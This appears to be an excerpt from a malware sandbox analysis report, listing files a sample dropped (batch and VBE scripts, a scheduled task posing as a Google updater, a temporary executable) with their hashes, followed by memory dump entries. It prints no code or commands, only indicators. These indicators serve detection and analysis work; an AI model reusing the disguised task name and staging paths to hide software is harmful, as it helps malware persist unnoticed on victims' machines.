60f3d7a4458814934582f0c5da2efe1276a488b2

SHA256
43a321cad0d2e1306c6851ea0f88b951e12d510ee742c2a781ea42dbc1376762

SHA512
fedf9bad47acdd7329a46360cc1f091780c9aca3f26811a7a175bd9c39f5cf6007974dd42d33c13523e3d0c702dd8ac29620273319d8a01594cc14d3314bc95e

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
2e48b72b759d1d41dca44d8dcd90f025

SHA1
9cf79e70bedf1286b6a7bce56711a98a0026c362

SHA256
c8f4b39b35b14b1d5d21a23b849ec59aeccd7c081a0ee39fc57605278d5cff2c

SHA512
8b5598276abb66e910421b3a1f12e45cfd8310edb101cc8050572d1e044d6767b6d166d978074fc3025fa8199468110541812d727ab80e18d51ce5cfa20476cb

Download Submit
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC

Filesize
3KB

MD5
0dadc6f45f1b7a298015ee64bc77ba6f

SHA1
b82afce3a7b247e26ee5fb50fbf670985be7f36d

SHA256
ae3961127f85ced561b81916a5b0df241853c8c6bcc93bd2252b0d3423fda1f7

SHA512
f86965f438222842fad0a8334b388e528890dcaeb16ebf99dfa882e745cc38dbd09d032a07ccaa4f2784d235e882f6a9216e189a8547467f419479b6edbde0ec

Download Submit
C:\containerperf\OHYKCXOXzFm1PCyBPS6uXfmto4OWxv9XE4FGIVj.bat

Filesize
200B

MD5
705bbadbf818277ddd38afa10533756b

SHA1
1d5fb39c2793854e8c7d848798e39c659aa3e22d

SHA256
871ef6a27bc10a920ce0890b50bf9926b7dbd4eea19a97a19bb837be7a97e5f3

SHA512
f8c46c4e4e31445a397af9f437b86b15edd48047c24f9c78f0e49efa28ea293465cb7aef242e71b2d127deba3827aee8f00c7cc11085f8c05a771b1cfbf36c31

Download Submit
C:\containerperf\mtmIdTw4RygS3trJMnWvLFqF6dzRpLwhZvwqEPqaKDGsnR5lufKuCs3iyL.vbe

Filesize
230B

MD5
3ef9810ceb57153ab80dd204f33e7f91

SHA1
3fd4057ecad16cf11f2cab6d0ad44be3bd4b0e3f

SHA256
d88a8b553f99f796c80a9e7cc41534b43fab45c7b13fd1d52c9b580d541a272e

SHA512
e65cad2c807bf012d13842dac72bd2436d182702fc7bb7fb212487b322a9442504a7c1f42df57e760ac24c322b810ba8c2ffa616dd2acdfb8098bdb5e8012fe9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2kow1az\n2kow1az.0.cs

Filesize
397B

MD5
dc09eb32b3bf664cff197409691e3659

SHA1
159428de09d49b7dc6c20ca7d0fa271132c88efd

SHA256
5090e125768b39e8e3d2869a856b14fec6f829f4b8caf635199ea73ca6d178c6

SHA512
7dd84624d7039b10fd1483f950e15cad28798a7f7e1f83292ee6c518dd95b1f811aae53cf561261df1d3abf538f11e01abfba1094c50bea8707ca906db1b6786

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\n2kow1az\n2kow1az.cmdline

Filesize
235B

MD5
8fb1616440f3d013239c64c83c293c17

SHA1
303dcae5642795eac5fa5bd8266c778c33a2c46e

SHA256
ef8a51ba2e62ed0f8843fe6142333e08a758b468d840db54bbb7953176bfb9de

SHA512
7accf3d6dce6de277925dfd9c71fd48c93fb0de692e0f1a6a763887573f32a8803adc0cb44af8d657618d538baea5e23f2284e59f4240b2e57bc5aad19c8ac09

Download Submit
\??\c:\Windows\System32\CSC9175271B41B14A2EA1B778189E3E6F6.TMP

Filesize
1KB

MD5
078586b266e519b5c113064d7a0bf45c

SHA1
a9395c0ef35add5c75591ebb94c85c1f33f408bf

SHA256
ccf292ff9f142b204ad4f4481a044ba8f9ab274305dcb604bf0b8ae91819ab1e

SHA512
5b8eb6aad62657309088c4668d633c2aa6324d4824ec32c3c5e133df0a5493a4342c980e077ba565f3aab29c58f95c8db7195415a1e554384405c1457730f959

Download Submit
\Users\Admin\AppData\Local\Temp\twain_32.exe

Filesize
5.7MB

MD5
1ff26b7d334cd22e726caf72a4208b96

SHA1
d2a1ad17e27c01072ac41d4d20426dd5ca7554ad

SHA256
56ece6be060502193ed0360a8ff7d0633dc7e88d133b28b8a73dfb755d2134db

SHA512
787b02b048dad824dd216a0b33872b2012fc8b2c47d831a33c4eb05399df9a253bd30a8789659a7da0eea8535bb78705685ac67ae546d2f10210c7ba552b4f49

Download Submit
memory/432-208-0x0000000000B80000-0x0000000000BA1000-memory.dmp

Filesize
132KB

Download
memory/432-210-0x0000000000B80000-0x0000000000BA1000-memory.dmp

Filesize
132KB

Download
memory/432-211-0x0000000000BB0000-0x0000000000BD7000-memory.dmp

Filesize
156KB

Download
memory/432-213-0x0000000037A90000-0x0000000037AA0000-memory.dmp

Filesize
64KB

Download
memory/432-212-0x000007FEBE230000-0x000007FEBE240000-memory.dmp

Filesize
64KB

Download
memory/480-218-0x0000000000E30000-0x0000000000E57000-memory.dmp

Filesize
156KB

Download
memory/480-220-0x0000000037A90000-0x0000000037AA0000-memory.dmp

Filesize
64KB

Download
memory/480-219-0x000007FEBE230000-0x000007FEBE240000-memory.dmp

Filesize
64KB

Download
memory/488-226-0x0000000000140000-0x0000000000167000-memory.dmp

Filesize
156KB

Download
memory/488-227-0x000007FEBE230000-0x000007FEBE240000-memory.dmp

Filesize
64KB

Download
memory/488-228-0x0000000037A90000-0x0000000037AA0000-memory.dmp

Filesize
64KB

Download
memory/496-265-0x0000000000980000-0x00000000009A7000-memory.dmp

Filesize
156KB

Download
memory/608-264-0x0000000000450000-0x0000000000477000-memory.dmp

Filesize
156KB

Download
memory/860-1953-0x0000000000BA0000-0x0000000000D98000-memory.dmp

Filesize
2.0MB

Download
memory/912-204-0x0000000002650000-0x0000000002658000-memory.dmp

Filesize
32KB

Download
memory/912-203-0x000000001B570000-0x000000001B852000-memory.dmp

Filesize
2.9MB

Download
memory/1416-1733-0x0000000000090000-0x0000000000288000-memory.dmp

Filesize
2.0MB

Download
memory/1484-76-0x000000001B670000-0x000000001B952000-memory.dmp

Filesize
2.9MB

Download
memory/1484-78-0x0000000002860000-0x0000000002868000-memory.dmp

Filesize
32KB

Download
memory/1684-172-0x0000000000BA0000-0x0000000000D98000-memory.dmp

Filesize
2.0MB

Download
memory/2040-1829-0x0000000000160000-0x0000000000358000-memory.dmp

Filesize
2.0MB

Download
memory/2256-1952-0x0000000000250000-0x0000000000448000-memory.dmp

Filesize
2.0MB

Download
memory/2340-1938-0x0000000000FE0000-0x00000000011D8000-memory.dmp

Filesize
2.0MB

Download
memory/2348-206-0x0000000077A50000-0x0000000077BF9000-memory.dmp

Filesize
1.7MB

Download
memory/2348-207-0x0000000077930000-0x0000000077A4F000-memory.dmp

Filesize
1.1MB

Download
memory/2576-169-0x000000013F780000-0x000000013FD41000-memory.dmp

Filesize
5.8MB

Download
memory/2644-38-0x0000000000320000-0x000000000032E000-memory.dmp

Filesize
56KB

Download
memory/2644-44-0x0000000000610000-0x000000000061C000-memory.dmp

Filesize
48KB

Download
memory/2644-36-0x00000000005E0000-0x00000000005F8000-memory.dmp

Filesize
96KB

Download
memory/2644-34-0x0000000000340000-0x000000000035C000-memory.dmp

Filesize
112KB

Download
memory/2644-32-0x0000000000310000-0x000000000031E000-memory.dmp

Filesize
56KB

Download
memory/2644-30-0x0000000000E30000-0x0000000001028000-memory.dmp

Filesize
2.0MB

Download
memory/2644-40-0x0000000000330000-0x000000000033C000-memory.dmp

Filesize
48KB

Download
memory/2644-42-0x0000000000600000-0x000000000060E000-memory.dmp

Filesize
56KB

Download
memory/2700-315-0x000000001B5D0000-0x000000001B8B2000-memory.dmp

Filesize
2.9MB

Download
memory/2712-0-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/2712-14-0x0000000000400000-0x0000000000B63000-memory.dmp

Filesize
7.4MB

Download
memory/2812-1274-0x0000000000BA0000-0x0000000000D98000-memory.dmp

Filesize
2.0MB

Download
memory/2840-638-0x0000000000A80000-0x0000000000A88000-memory.dmp

Filesize
32KB

Download
memory/3032-1472-0x0000000000060000-0x0000000000258000-memory.dmp

Filesize
2.0MB

Download